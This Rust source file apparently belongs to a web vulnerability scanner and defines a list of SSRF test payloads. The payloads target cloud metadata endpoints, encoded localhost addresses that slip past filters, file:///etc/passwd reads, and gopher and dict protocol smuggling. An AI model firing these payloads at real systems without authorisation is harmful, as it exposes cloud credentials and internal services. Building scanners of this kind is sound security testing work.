use crate::domain::active_vuln::{ExpectedIndicator, PayloadDefinition};
use crate::domain::entities::SeverityLevel;

pub fn get_payloads() -> Vec<PayloadDefinition> {
    vec![
        PayloadDefinition {
            id: "ssrf_01".into(),
            payload: "http://127.0.0.1".into(),
            description: "Localhost SSRF probe".into(),
            expected_indicator: ExpectedIndicator::ResponseDiff {
                baseline_hash: String::new(),
                indicator: "internal_page".into(),
            },
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_02".into(),
            payload: "http://169.254.169.254/latest/meta-data/".into(),
            description: "AWS metadata endpoint".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("ami-id".into()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_03".into(),
            payload: "http://metadata.google.internal/computeMetadata/v1/".into(),
            description: "GCP metadata endpoint".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("instance".into()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_04".into(),
            payload: "http://169.254.169.254/metadata/instance?api-version=2021-02-01".into(),
            description: "Azure IMDS metadata endpoint".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("compute".into()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_05".into(),
            payload: "http://0.0.0.0".into(),
            description: "Zero-address SSRF bypass".into(),
            expected_indicator: ExpectedIndicator::StatusCode(200),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_06".into(),
            payload: "http://[::1]".into(),
            description: "IPv6 localhost SSRF".into(),
            expected_indicator: ExpectedIndicator::StatusCode(200),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_07".into(),
            payload: "http://0x7f000001".into(),
            description: "Hex-encoded localhost bypass".into(),
            expected_indicator: ExpectedIndicator::StatusCode(200),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_08".into(),
            payload: "http://2130706433".into(),
            description: "Decimal IP localhost bypass".into(),
            expected_indicator: ExpectedIndicator::StatusCode(200),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_09".into(),
            payload: "http://127.127.127.127".into(),
            description: "127.0.0.0/8 localhost bypass".into(),
            expected_indicator: ExpectedIndicator::StatusCode(200),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_10".into(),
            payload: "http://0177.0000.0000.0001".into(),
            description: "Octal IP localhost bypass".into(),
            expected_indicator: ExpectedIndicator::StatusCode(200),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_11".into(),
            payload: "http://127.1".into(),
            description: "Short IP localhost bypass".into(),
            expected_indicator: ExpectedIndicator::StatusCode(200),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_12".into(),
            payload: "http://localtest.me".into(),
            description: "DNS resolution to localhost (localtest.me)".into(),
            expected_indicator: ExpectedIndicator::StatusCode(200),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_13".into(),
            payload: "dict://127.0.0.1:11211/stat".into(),
            description: "Memcached dict protocol smuggling".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("STAT".into()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "ssrf_14".into(),
            payload: "file:///etc/passwd".into(),
            description: "File protocol SSRF / LFI".into(),
            expected_indicator: ExpectedIndicator::FileContent("root:".into()),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "ssrf_15".into(),
            payload: "gopher://127.0.0.1:25/xHELO%20limma%250d%250aQUIT%250d%250a".into(),
            description: "Gopher protocol smuggling".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("SMTP".into()), // Approximate
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "ssrf_16".into(),
            payload: "http://169.254.169.254.xip.io/".into(),
            description: "xip.io metadata bypass".into(),
            expected_indicator: ExpectedIndicator::StatusCode(200),
            severity: SeverityLevel::Critical,
            safe_for_production: true,
        },
    ]
}
